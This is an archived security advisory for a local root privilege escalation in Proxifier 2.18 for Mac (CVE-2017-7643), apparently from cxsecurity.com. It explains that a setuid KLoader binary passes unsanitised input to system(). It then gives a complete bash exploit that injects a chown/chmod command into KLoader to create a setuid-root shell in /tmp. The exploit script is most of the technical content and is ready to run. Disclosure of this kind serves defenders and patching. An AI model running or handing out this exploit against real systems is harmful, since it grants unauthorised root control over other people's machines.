Proxifier 2.18 Privilege Escalation / Code Execution

2017.04.12
Credit: Mark Wadham
Risk: High
Local: No
Remote: Yes
CWE: CWE-264


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Proxifier 2.18 (also 2.17 and possibly some earlier version) ships with a KLoader binary which it installs suid root the first time Proxifier is run. This binary serves a single purpose which is to load and unload Proxifier's kernel extension. Unfortunately it does this by taking the first parameter passed to it on the commandline without any sanitisation and feeding it straight into system(). This means not only can you load any arbitrary kext as a non-root user but you can also get a local root shell. Although this is a bit of a terrible bug that shouldn't be happening in 2017, Proxifier's developers fixed the issue in record time so that's something! Everyone using Proxifier for Mac should update to 2.19 as soon as possible. https://m4.rkw.io/blog/cve20177643-local-root-privesc-in-proxifier-for-mac--218.html ------------------------------------------------------------------- #!/bin/bash ##################################################################### # Local root exploit for vulnerable KLoader binary distributed with # # Proxifier for Mac v2.18 # ##################################################################### # by m4rkw # ##################################################################### cat > a.c < #include int main() { setuid(0); seteuid(0); execl("/bin/bash", "bash", NULL); return 0; } EOF gcc -o /tmp/a a.c rm -f a.c /Applications/Proxifier.app/Contents/KLoader 'blah; chown root:wheel /tmp/a ; chmod 4755 /tmp/a' /tmp/a -------------------------------------------------------------------

References:

https://m4.rkw.io/blog/cve20177643-local-root-privesc-in-proxifier-for-mac--218.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top